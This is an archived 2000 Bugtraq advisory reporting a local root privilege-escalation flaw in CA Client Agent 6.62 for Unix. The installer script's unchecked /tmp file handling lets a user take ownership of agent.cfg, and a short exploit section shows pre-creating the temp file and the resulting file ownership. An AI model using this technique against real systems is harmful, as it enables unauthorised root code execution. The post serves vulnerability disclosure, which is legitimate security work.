[16018] in bugtraq
Client Agent 6.62 for Unix Vulnerability
daemon@ATHENA.MIT.EDU (zorgon@SDF.FREESHELL.ORG)
Mon Jul 31 13:05:37 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Message-Id: <20000728034420.A19824@sdf.freeshell.org>
Date: Fri, 28 Jul 2000 03:44:20 +0000
Reply-To: zorgon@SDF.FREESHELL.ORG
From: zorgon@SDF.FREESHELL.ORG
To: BUGTRAQ@SECURITYFOCUS.COM
Client Agent 6.62 for Unix Vulnerability
Hi all,
Excuse-me for my poor english :)
I discover a vulnerability in Client Agent 6.62 for Unix.
It's tested on a Debian 2.2.14
Perhaps it doesn't important.
Introduction
--------------
Client Agent has a hole allowing to execute an arbitrary code by root
without its knowing. In the meantime, some conditions are necessary to
exploit this vulnerability.
Description
------------
Client Agent is used with ARCserveIT, the safe software. It must be installed
on all the workstations. A global configuration file agent.cfg keep every
sub-agents installed on your system. This file is in /usr/CYEagent, and receive
the information from the sub-agent when the script /opt/uagent/uagensetup is run.
uagent.cfg:
debian:/usr/CYEagent# more agent.cfg
#
#(c) Copyright 1989-1999 Computer Associates International, Inc.
#and/or its subsidiaries. All Rights Reserved. Use by the United
#States Government is subject to RESTRICTED RIGHTS as set out in
#the license agreement.
#
[0]
#[UAGENT]
NAME Uagent
VERSION 5.0.0
HOME /opt/uagent
#ENV CHEY_ENV_DEBUG_LEVEL=4
ENV LD_LIBRARY_PATH=/usr/local/CAlib:/usr/CYEagent:$LD_LIBRARY_PATH
ENV SHLIB_PATH=/usr/local/CAlib:/usr/CYEagent:$SHLIB_PATH
ENV LIBPATH=/usr/local/CAlib:/usr/CYEagent:$LIBPATH
BROWSER asbr
AGENT uagentd
MERGE umrgd
VERIFY umrgd
where asbr, uagentd, and umgrd are programms in /opt/uagent
Client Agent is vulnerable only if uagentsetup is run a second time. The first time,
it creates the folder /usr/CYEagent and the file agent.cfg, but after it creates
a backup of agent.cfg and creates a new agent.cfg without checking permissions.
The code in /opt/uagent/uagentsetup :
# append lines
#
case $ANS in
y|Y|yes|YES|Yes)
cat ${UAGENT_HOME}/.agent.cfg >> ${TMPFILE} || exit 2
${ECHO} >> ${TMPFILE} || exit 2
mv ${TMPFILE} $dest || exit 2 <------------
;;
esac
So anyone can control this file. The modifications to this file will be used when
the sub-agent will be stopped and restarted.
Exploit
--------
[zorgon@debian /]$ cd /tmp
[zorgon@debian /tmp]$ touch uagent.tmp
[zorgon@debian /tmp]$ chmod 700 uagent.tmp
If uagentsetup is run a second time :
[zorgon@debian /]$ ls -lag /usr/CYEagent/
total 176
drwxr-xr-x 3 root root 4096 Jul 19 17:46 .
drwxr-xr-x 15 root root 4096 Jul 11 10:37 ..
-rw-r--r-- 1 zorgon users 618 Jul 19 17:47 agent.cfg
-rw-r--r-- 1 root root 618 Jul 19 17:47 agent.cfg.old
-rwxr-xr-x 1 root root 16899 Jul 11 10:37 asagent
-rwxr-xr-x 1 root root 105280 Jul 11 10:37 asagentd
lrwxrwxrwx 1 root root 11 Jul 12 10:54 li -> /usr/lib/li
-rwxr-xr-x 1 root root 27878 Jul 19 17:47 libarclic98_api.so
drwxr-xr-x 3 root root 4096 Jul 11 10:37 nls
[zorgon@debian /]$
--
zorgon@sdf.lonestar.org
Web Site : http://www.nightbird.fr.st
